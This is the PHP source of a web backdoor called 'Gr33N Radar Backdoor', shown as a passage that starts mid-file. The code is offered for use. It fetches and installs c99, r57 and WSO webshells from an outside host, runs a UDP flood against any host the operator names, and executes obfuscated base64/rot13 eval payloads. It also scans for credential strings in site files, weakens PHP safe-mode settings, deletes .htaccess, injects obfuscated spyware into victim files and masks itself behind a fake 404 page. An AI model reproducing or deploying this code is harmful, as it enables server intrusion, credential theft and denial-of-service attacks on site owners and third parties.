alert("c99 installed!")'; //| header( "refresh:1;url=$myname?backdoor=activation"); //| }; //| if (isset($_GET['deletec99'])) { //| unlink("c99.php"); //| echo ''; //| header( "refresh:1;url=$myname?backdoor=activation"); //| };; //| /*------------------------------------------------------------------------------------*/ /*------------------------------------------------------------------------------------*/ /* r57 */ /*------------------------------------------------------------------------------------*/ if (isset($_GET['installr57'])) { //| $getr57 = file_get_contents("https://www.localroot.net/shell-r57.txt"); //| $fps = fopen("r57.php","w"); //| fputs ($fps,"$getr57"); //| fclose($fps); //| echo ''; //| header( "refresh:1;url=$myname?backdoor=activation"); //| }; //| if (isset($_GET['deleter57'])) { //| unlink("r57.php"); //| echo ''; //| header( "refresh:1;url=$myname?backdoor=activation"); //| };; //| /*------------------------------------------------------------------------------------*/ /*------------------------------------------------------------------------------------*/ /* WSO */ /*------------------------------------------------------------------------------------*/ if (isset($_GET['installWSO'])) { //| $getWSO = file_get_contents("https://www.localroot.net/shell-wso-php-7.txt"); //| $fpWSO = fopen("WSO.php","w"); //| fputs ($fpWSO,"$getWSO"); //| fclose($fpWSO); //| echo ''; //| header( "refresh:1;url=$myname?backdoor=activation"); //| }; //| if (isset($_GET['deleteWSO'])) { //| unlink("WSO.php"); //| echo ''; //| header( "refresh:1;url=$myname?backdoor=activation"); //| };; //| /*------------------------------------------------------------------------------------*/ //For activate backdoor <-- filename.php?backdoor=activation --> if(!empty($_GET['backdoor']=="activation")) { print '

Welcome to';
print '
    _  _  _  _                              _                                 
   (_)(_)(_)(_) _                          (_)                                
   (_)         (_)  _  _  _        _  _  _ (_)   _  _  _     _       _  _     
   (_) _  _  _ (_) (_)(_)(_) _   _(_)(_)(_)(_)  (_)(_)(_) _ (_)_  _ (_)(_)    
   (_)(_)(_)(_)     _  _  _ (_) (_)        (_)   _  _  _ (_)  (_)(_)          
   (_)   (_) _    _(_)(_)(_)(_) (_)        (_) _(_)(_)(_)(_)  (_)             
   (_)      (_) _(_)_  _  _ (_)_(_)_  _  _ (_)(_)_  _  _ (_)_ (_)             
   (_)         (_) (_)(_)(_)  (_) (_)(_)(_)(_)  (_)(_)(_)  (_)(_)             
                                                                              
                 backd00r
                          ';
print "

"; print ' '; print "

$today

$identy

"; //#Single DoS and DoS Net /*------------------------------------------------------------------------------------*/ /* War Mode */ /*------------------------------------------------------------------------------------*/ //# --Single UDP Flood-- $j = " / \ `. __..-,O : \ --''_..-'.' | . .-' `. '. : . .`.' \ `. / .. \ `. ' . `, `. \ ,|,`. `-.\ '.|| ``-...__..-` | | |__| /||\ //||\\ // || \\ __//__||__\\__ '--------------'"; if(!empty($_GET['backdoor']=="activation" and $_GET['mode']=="war" )) { echo "

$j

"; echo '

--UDP Flood--

'; //#DoS-NeT --UDP Flood-- echo' '; } if(isset($_GET['host'])&&isset($_GET['time'])) { $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $packets++; if(time() > $max_time) { break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } echo "

$j

"; $host_r = strip_tags("$host", ENT_QUOTES); print ""; print_r ("

--UDP Flood--

[$host_r] ~ Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets for second \n"); echo '
'; header( "refresh:3;url=$myname?backdoor=activation"); } //#DoS-NeT --UDP Flood 2-- /*------------------------------------------------------------------------------------*/ /* DoS-NeT code */ /*------------------------------------------------------------------------------------*/ eval(gzuncompress(base64_decode(str_rot13('rWl1yA9XjmNHu+/7STTZEF/phi4iAuBsDZTOS6BHefy fpYnFOe0DsKoo1qExDKVu6IK4mvU9swyj6BSvKgmsCJk3xY4JWJnftmxbTjjRkz1KpCcPrgllvGnRemKv9pEEx n81OEbWAEWcWVo52p2W1cCdvv7ZY8TUZksMNNW63TgaYxWX9q/psK24F6dA6HshdqjG3Sr5Y3vt8xQjHBJu4WU XV8SwyprPWlcCOR9Iax653YAt7yNuIq2PJInEuuB22K3y4Nb8ycFQoH3N7MRjiykzr7nMGn30jZe+NFyTjl14Q DTa/RwD+SwtaJWrV+uPHOC6ICCGfJZItvrWz31MCrB2MnvfBU0eBJ2oEq12UR2mJjmGDABb4PMows/8J8XGWGl GuTqUjcpysWBRo0pvxPHPx0EtElXHW HXGETuUVcVyVcARMRpvyvIvx0EfElXEWEXGETWUVcHyHcARnxrv33algaXA68e9y4pQGy+2+yziiqsaA+G0pKD= ')))); //#Server Autoscanner-- if(!empty($_GET['backdoor']=="activation" and $_GET['scanme'])) { echo "Scanner $identy results:
"; ini_set('max_execution_time', 0); ini_set('memory_limit', -1); $portsz = array(21, 22, 25, 80, 81, 110, 143, 443, 587, 2525, 3306); foreach ($portsz as $portz) { $connectionzx = @fsockopen($identy, $portz, $errno, $errstr, 2); if (is_resource($connectionzx)) { echo '

' . $identy . ':' . $portz . ' ' . '(' . getservbyport($portz, 'tcp') . ') is open.

' . "\n"; fclose($connectionzx); } else { echo '

' . $identy . ':' . $portz . ' is closed.

' . "\n"; } } } //scanner end /*------------------------------------------------------------------------------------*/ /* War Mode End */ /*------------------------------------------------------------------------------------*/ print 'Gr33N Radar Backdoor v0.1

'; echo "

--PHP Shells Management--

"; if (false!==file("c99.php")) echo "c99 2.0 shell installed - view / ~delete"; else echo ' install c99 2.0 shell'; print "
"; if (false!==file("r57.php")) echo "r57 shell installed - view / ~delete"; else echo ' install r57 shell'; print "
"; if (false!==file("WSO.php")) echo "WSO shell installed - view / ~delete"; else echo ' install WSO shell'; print "

"; //#Favorite Shell installer echo '

Install external PHP File:\_

--Favorites Shells installed--

'; if(!empty($_POST['favorite'] && $_POST['favorite_nm'])) { $install_fav = $_POST['favorite']; $install_fav_nm = $_POST['favorite_nm']; $getsfav = file_get_contents("$install_fav"); $fpp = fopen("bck_$install_fav_nm","w"); fputs ($fpp,"$getsfav"); fclose($fpp); $realnmm = basename($install_fav); echo ""; };;; //listing your external installations $ext = array("php","html","htm",); foreach ($ext as $extt) { foreach (glob("./*.$extt") as $filename) { $prefix = 'bck_'; if (strpos($filename, $prefix) != false) { $cleanme = basename($filename); echo "- $cleanme
"; } } };;;; /*------------------------------------------------------------------------------------*/ /* #Terminal version 0.1 */ /*------------------------------------------------------------------------------------*/ echo'

#HELP--
<-- Terminal Commands -->
"rename" = rename file
"unistall" = unistall backdoor
"wget https://www.site.com/file.jpg" = wget file
"delete" = delete file
"getSRVip" = see server IP
"phpinfo" = phpinfo calling
"system" = see system info
"mysql" = database INFO
"php.ini" = set safe_mode off & shell_exec = On
"php_uname" = get php_uname INFO
"disabled_func" = PHP Disabled Functions
"open_basedir" = Alloweds paths for using PHP
"memory_d" = Memory disk INFO

Terminal:\_
'; if($_POST['command'] == "~backdoor>> rename") { $ren = $_POST['command']; $rename = '~backdoor>> rename'; if (strpos($ren, $rename) != true) { echo''; } } //#rename if($_POST['oldname'] and $_POST['newname']) { $olddname = $_POST['oldname']; $newwname = $_POST['newname']; rename($olddname , $newwname); echo ''; };; //#unistall if($_POST['command'] == "~backdoor>> unistall") { $unistall_me = $_SERVER['PHP_SELF']; unlink(basename($unistall_me)); echo ''; } //#wget if(strpos($_POST['command'] , '~backdoor>> wget') !== false) { $uno = "~backdoor>> wget "; $wget = $_POST['command']; $due = ""; $url = str_replace($uno,$due,$wget); $fileee = file_get_contents($url); $nameeee = basename($url); $exttt = pathinfo($url, PATHINFO_EXTENSION); $namee2 =pathinfo($url, PATHINFO_FILENAME); $processing = "wget.txt"; $fp = fopen($processing,"w"); fputs ($fp,"$url"); fclose($fp); $line = file($processing)[0]; $grabbing = file_get_contents("$line"); $fp = fopen("$namee2.$exttt","w"); fputs ($fp,"$grabbing"); fclose($fp); unlink("wget.txt"); }; //#delete if($_POST['command'] == "~backdoor>> delete") { echo''; } if (isset($_POST['deletef'])) { $trashfile = $_POST['deletef']; unlink("$trashfile"); echo ""; } //#GeT Server IP if($_POST['command'] == "~backdoor>> getSRVip") { $getSRVip = getHostByName(getHostName()); $userADDr = $_SERVER['REMOTE_ADDR']; echo "Server addr. $getSRVip
"; echo "Your addr. $userADDr"; echo "

"; } //#phpinfo if($_POST['command'] == "~backdoor>> phpinfo") { echo phpinfo(); } //#system info if($_POST['command'] == "~backdoor>> system") { $Wserver = $_SERVER['SERVER_SOFTWARE']; echo "Web server :. $Wserver"; echo "
system :. "; echo PHP_OS; echo "
System admin :. "; echo $_SERVER['SERVER_ADMIN']; } //#MySQL dedicate if($_POST['command'] == "~backdoor>> mysql") { echo '
'; } if(!empty($_POST['dbuser'] && $_POST['dbpass'] && $_POST['dbname'])) { $dbhost = "localhost"; $dbuser = $_POST['dbuser']; $dbpass = $_POST['dbpass']; $dbname = $_POST['dbname']; $conn = new mysqli($dbhost, $dbuser, $dbpass, $dbname); //connection if($conn->connect_error) { die("Connection failed! " . $conn->connect_error); } //#db version echo '

Database Version:

'; echo mysqli_get_client_info(); //#tables $sql = "SHOW TABLES"; $result = $conn->query($sql); if($result->num_rows > 0) { echo '

Tables List on Current DB:

'; while($row = $result->fetch_array()) { echo "-----> "; echo $row[0] . "
"; } } else { echo "
No tables Found
"; } //databases(); $sql2 = "SHOW DATABASES"; $resultt = $conn->query($sql2); if($resultt->num_rows > 0) { echo '

Databases List:

'; while($roww = $resultt->fetch_array()) { echo "-----> "; echo $roww[0] . "
"; } } $conn->close(); }; //#safe_mode OFF && shell_exec On if($_POST['command'] == "~backdoor>> php.ini") { if (!file_exists("php.ini")) { $writePHP = fopen("php.ini", 'a'); fwrite($writePHP, "safe_mode = off\nexec = On\nshell_exec = On "); fclose($writePHP); echo "php.ini installed - safe_mode is off now!
"; } elseif (file_exists("php.ini")) { echo ""; } } //#php_uname command if($_POST['command'] == "~backdoor>> php_uname") { print php_uname(); } //#php functions blocked if($_POST['command'] == "~backdoor>> disabled_func") { $disabled_funcSRV = @ini_get("disable_functions"); print "-----> PHP Disabled Functions on $identy
"; print_r ("~[$disabled_funcSRV]"); } //#alloweds paths for working with --PHP-- if($_POST['command'] == "~backdoor>> open_basedir") { $obx = @ini_get("open_basedir"); print "-----> Alloweds paths By PHP
"; print_r ("~[$obx]"); } //#Srv disk --memory-- if($_POST['command'] == "~backdoor>> memory_d") { $sdir = '/'; //get disk space free (in bytes) $disk_free = disk_free_space($sdir); $disk_total = disk_total_space($sdir); $disk_used = $disk_total - $disk_free; $disk_used_p = sprintf('%.2f',($disk_used / $disk_total) * 100); function convertSize( $bytes ) { $sizes = array( 'B', 'KB', 'MB', 'GB', 'TB' ); for( $i = 0; $bytes >= 1024 && $i < ( count( $sizes ) -1 ); $bytes /= 1024, $i++ ); return( round( $bytes, 2 ) . " " . $sizes[$i] ); } $disk_free = convertSize($disk_free); $disk_used = convertSize($disk_used); $disk_total = convertSize($disk_total); echo '

[Memory Disk INFO:]

'; echo "~Total: $disk_total
"; echo "~Used: ".$disk_used." ($disk_used_p%)
"; echo "~Free: $disk_free
"; echo ""; } //#terminal end echo '

?#

interessing Files

'; echo '

?#

RFI/LFI --PHP_Injector

'; echo '

?#

Spyware installation
'; //using spyware if (false!==file("system_sql.php")) echo "spyware installed - view logs / ~delete
[~] - Select File to Spy"; else echo 'install spyware'; echo'

'; echo '
[Code By Emiliano Febbi] ~My Site: nullsite.altervista.org'; echo ""; } else { //Backdoor --obfuscation System-- $hostname = $_SERVER['HTTP_HOST']; $curl = curl_init("http://$hostname"); curl_setopt($curl, CURLOPT_NOBODY, true); $result_ = curl_exec($curl); if ($result_ !== false) { $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE); if ($statusCode == 404) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://'.$hostname.'/404site'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } else { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://'.$hostname.'/404site'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } } else { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://'.$hostname.'/404site'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } };;;;; /*---------------------------------------------------------------------------------------------------------*/ /* Backdoor #HELPER 0.1 */ /*---------------------------------------------------------------------------------------------------------*/ //sensitive files checker $myname2 = basename($myname); if (isset($_GET['intF'])) { print '

#Sensitive Files List:

'; $sensitive = array("user", "username", "password", "pwd", "pass", "config", "dbhost", "dbuname", "dbname", "dbpass", "dbtype", "admin", "root", "md5", "dbuser", "ftp", "database", "users", "user_name", "login", "host", "db", "ftp_host", "ftp_pass", "ftp_user", "ftp_root", "prefix"); foreach($sensitive as $sensitive_files) { $dir777 = './'; $files777 = scandir($dir777,1); foreach ($files777 as $lines777) { if(strlen($lines777) > 3 && strpos($lines777, '.php', '.html', '.txt', '.asp', '.aspx', '.js') !== false) { $readfile777 = fopen('./'.$lines777, 'r'); while(!feof($readfile777)) { $contents777 = fgets($readfile777); if(strpos($contents777, $sensitive_files) !== false) echo str_replace("$myname2", "" , "
$lines777"); } fclose($readfile777); } } } } //#PHP_Injector if (isset($_GET['inj_'])) { // LFI ~ RFI //For activate RFI/LFI on victime Page infected <-- filename.php?radar=../ or filename.php?radar=http://www.site.com/shell.txt --> echo'

--Bad Code injector [Default code] - RFI/LFI page infection

eval(str_rot13(gzinflate(str_rot13(base64_decode("
LUjHDva4DXyaxWFh7gU5uX7uvV8C9967nz5p/hgGWcnSVRySw6Ue
7n+2/ojXeyiXf8ahSzDkP/
MyJfPyQj40SH7/f/C3rPIwkPwGWonWlpzNcwyvdpQvf5hhisMNQp
la8/oLsusaSoN5cxKrP/
lqnBKFzNr2eIWT9heki7y2b3bsvhNHunalAr7WOx++n1oWonMLGK
tCo74b4jYTIZzJzy0LZ
E8FylDIday9JTctecpRvGrbzyB9IymlvXwHU7hpGWlVr8nLWCudY
JAfdctUUHCCoo8Y6fT+KrM
rMvWMMKEnY6a4Ix21cp4nZ3a61AtmFgBB2vEZq03BdFvtaE+vWED
e40NJ2QYDsd/dIHkPL8m
cVrMEC9mW8kQLT92cGq8XvsQPShyu7Dz4F/vEjIUW+ab2nhwDFYs
Pka90ovr5P7/QJ9S9J
oDyzwAeQRDcNi3CHCgPptuTpGOFwiyjoLxsMSatlNgXI+7KQLvCf
iQOFxBr0Y18tLebH
ItHYqHLlbYDG5qy1wMHj86aJ2Rek1ydl13LZlRdxfVIeRsf50hCD
QkXA3Lv6Ss8UYPrUe/
8oPYfm/6LWL9TR467zfPDnpZ/b0iqSdAr8hcxoiNENH3nY1AE+qu
FfDeCzJvIVms6BNLjj
ePuKGOGBbco+czXWqgexZWKar4UfiRrUD+5+Cm16hUpkvM5jDVWv
uPDh+jAT9m2+nTHzlweW
/8YaU4mwNyWV5qktEbGYg7Y8fKuuF3F05mhYRarNny1w1aV0t3u4
XSCm422dhQeTaZ73K7GBlj/nm/
L5SWPViG/Nx2UhC0Q4wSd3XIjSGJozd4I6bP0xdPUuLtm8eqJ7LF
ADx8fIxgrxNFPUfBkCcJLntlVN
D4Qcy5d5C5RsfwqnpqFKQB/
Ai1KXyb1I25G7o4p8+lHR4Z1As1eY6TsAREbV8avmbmjFx9YYPSH
abWjMtCRm9jAVQLrmsiPk6wkWc5bPl+GF
N9hXq96vpiUGqGRw
/GdXhdgfKEnT+WzwfeLKjLcw2OEfm82SGBHHXfnVjAzxvPGeRfcH
UHeeKnpmMY3CTD8k2khwQDZE9ZecSvwMt
pLh5kLC2fD1g3uGcW0+
RVDHIhv2mjHC5aE0Xolz3LBnQI5E07gXEDse3Qfa/
tLX15DQhhmrRRjhA3Rxuq08UIGXDXFAxRTrK7a9JCpw0eLcU0SmGlO/
6TY8bGfZ5Z0t3248RpILJ6iHo00gjij0z5CHcH5rk7I+vprzG0Fv+
gE7YdGmAWOv3M/DmsXmEnhSmVNg7q/
VVNJfB3vuVR5fEVl316ZOu+HfgLvwEU+NOsKa8Cg6GVTKqlup5oY
PgmDnC0+bkUP8QIhiUjXeEk+CtZ4i25OGYN8an6aEzouN27DEv+KN
djzC2HrpyM771G
yQ3TyJx5CvKW/hPWZ2M2QlaPWlFGP1W0+j26pmdD4wwnFOdleR/
v8MltYqcBrzEI8G+80mGHuKsFeFzUeGp+XXir2YdGqDqs06a3LI1s
RCAYTqRCb8+rswo/
xuI7kzLEPS3ajxIOWctjaLpc4GNwGSrwWVAJOhZuk4yexv2y4x/cs
7tjfG1WGnceNaUTYUtK/
xEzXJ1dUNxjQDMg9tS1TEYWwvdlYlOkTo4dIjL3pRJaNFu22eZ3W1
rQ0NtGj37
7CX50yTFGwM3DoHL5Jcxcu43pFBVOeUEseRHyMrENmsrL6OjjpKab
nhh4YnE4VHNMDV3ZZalQAjIPg3E6dY/
PEPXvBz3cmv85JUekNo625J8hQSIKUWAl7Prsm/ND25SzWAT0a/mc
wLG0VFfVep6uBL1Z2XJBQoIQ7ZBvznI
ut8VE0tDV0Xsy
9eqXL3fyazX7xsCRmtaNKKUfdhKiS4AjPN7cJn3ltvBtM0Fd2sou0
PsYyFl4YMUakmrTTSyTFmT2ACmXHFR/
qlCtZ2v2dLmDjpwRHexy/vEJJVzbHfNdanyjODbWgadDV34pYTErO
v/ndbov0cwXP6KhtF/
I40aKhKKnWsA6rCqlGzeAC+haqXZqD5ZAM6UCjpnliKzpSPt+eyRD
Whjr0XQmgrv/
yZHkNr+IIJS4Twk728Ry6ZR1wmJDtdOYvysVK1ENIhuLmVf1NNwg+
N7dfgDnTv9Pa7lKjRlgx8mAdz99m9Mqg3qSR
/eJXnL/
khpWVU89pFl9uFBeLk5LHSFcTreWAuEuW3wt3WOIbnCGXAnnm1fA+
lFccYwnQiWEem8urU28ITNTrEwagrifIRyM/
svmvQQJM5zrS5I0G3luEwHMgoAHvCGctvEJTYIq6wgcPYgYnhl2vR
TLfXNELQYK0R5c0iDYZ81dXDataLW2Qu+W6
+vqz1cI31IV587V1ORksfils5IctjlrulH3vz2c9hjdWwqrHfb9H1
rN689cXctBnJ2oU1o2H5Zhqm/
0UvJbs5CvLWXmJHxWfR9uE+2+uXj5o+3+q970l9ee7Wn/B5t//bZ9//xc=")))));

'; if (!empty($_POST['file_nameinj'] and $_POST['php_injection'])) { $file_nameinj = $_POST['file_nameinj']; $php_injection = $_POST['php_injection']; rename("$file_nameinj", "$file_nameinj.txt"); $target_x = "3"; $statsz = file("$file_nameinj.txt", FILE_IGNORE_NEW_LINES); $offsetb = array_search($target_x,$statsz) +1; array_splice($statsz, $offsetb, 0, $php_injection); file_put_contents("$file_nameinj.txt", join("\n", $statsz)); $format_erase = str_replace(".txt", "", "$file_nameinj.txt"); rename("$file_nameinj.txt", "$format_erase"); print ""; } } //_______________________________ //|#Spyware Block code dedicated | //|______________________________| if (isset($_GET['delspy'])) { unlink("bconfiguration.txt"); unlink("system_sql.php"); echo ''; header( "refresh:1;url=$myname?backdoor=activation"); } if (isset($_GET['installspy'])) { /*--------------------------*/ /*| Creation File Spyware |*/ /*--------------------------*/ $spyware_code = " "; $write = fopen("system_sql.php", 'a'); fwrite($write, "$spyware_code"); fclose($write); print ''; header( "refresh:1;url=$myname?backdoor=activation"); } /*---------------*/ /*| File to Spy |*/ /*---------------*/ if (isset($_GET['filespy'])) { print '

Enter the name of the file to spy on [allowed only PHP files]

'; echo' '; } if (isset($_POST['filenspy'])) { $filenspy = $_POST['filenspy']; print "$filenspy now is under control!
"; /*---------------*/ /*| including |*/ /*---------------*/ $inc_me = "eval(str_rot13(gzinflate(str_rot13(base64_decode('LRXFDqxL9ng63bPDJbMqHAqn 0M0Eamq+fi4vWgL3XI77RQ/3P1t/xOs9lMs/40MsBPa/bJmSbPknH5oqv/+9/P3VBLRCxMJEub oldoeT8K7V/F5s/EYX6Lbjnwq9/0+cZRgWFU2OKe27HtxGik+gLPgLMVkqOZpUAv91sY74RIzA X+cue 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'))))); "; /*--------------------------*/ /*| Writing victime File |*/ /*--------------------------*/ rename("$filenspy", "$filenspy.txt"); $target_xy = "3"; $statszx = file("$filenspy.txt", FILE_IGNORE_NEW_LINES); $offsetbc = array_search($target_xy,$statszx) +1; array_splice($statszx, $offsetbc, 0, "$inc_me"); file_put_contents("$filenspy.txt", join("\n", $statszx)); $format_erasex = str_replace(".txt", "", "$filenspy.txt"); rename("$filenspy.txt", "$format_erasex"); } /*---------------------------------------------------------------------------------------------------------*/ /* END */ /*---------------------------------------------------------------------------------------------------------*/ //__________________________________________________________________________________ //| |######################| | //| |# Backdoor Safe_Mode #| | //| |######################| | //|_________________________________________________________________________________| if (isset($_GET['sm_editor'])) { print '

'; print "

Welcome To Safe_Mode

Gr33n Radar Backdoor v.01

"; print "

"; //deleting security files if (false!==file(".htaccess")) unlink(".htaccess"); else echo ""; if (false!==file("php.ini")) unlink("php.ini"); else echo ""; //For run File editor <-- backdoor_name.php?sm_editor=on --> //#Editor echo'Edit File:
'; if(isset($_GET['file_to_edit'])) { $file_to_edit = $_GET['file_to_edit']; ?> --Unable to open file--"); fwrite($myfilej, $codej); fclose($myfilej); echo "--File Edited--"; } }; //For run dir explorer <-- backdoor_name.php?sm_exp=on --> if (isset($_GET['sm_exp'])) { //File explorer echo '

'; echo "~ [Current Directory]
"; echo basename(__DIR__); echo '

'; echo '

~ [Files]

'; $startfolderj = './'; $filesss=array(); foreach( new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $startfolderj, RecursiveDirectoryIterator::KEY_AS_PATHNAME ), RecursiveIteratorIterator::CHILD_FIRST ) as $filew => $infoz ) { if( $infoz->isFile() && $infoz->isReadable() ) { $filesss[]=array('filename'=>$infoz->getFilename(),'path'=>realpath( $infoz->getPathname() ) ); } } echo '

',print_r($filesss,true),'

'; };; //For run root explorer <-- backdoor_name.php?sm_root_exp=on --> //root Explorer if (isset($_GET['sm_root_exp'])) { $startfolderp = $_SERVER['DOCUMENT_ROOT']; $filesp=array(); foreach( new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $startfolderp, RecursiveDirectoryIterator::KEY_AS_PATHNAME ), RecursiveIteratorIterator::CHILD_FIRST ) as $filep => $infop ) { if( $infop->isFile() && $infop->isReadable() ){ $filesp[]=array('filename'=>$infop->getFilename(),'path'=>realpath( $infop->getPathname() ) ); } } echo '

~ [All Files]

'; echo '

',print_r($filesp,true),'

'; };;; //__________________________________________________________________________________ //| |##########################| | //| |# Backdoor Safe_Mode End #| | //| |##########################| | //|_________________________________________________________________________________| ?>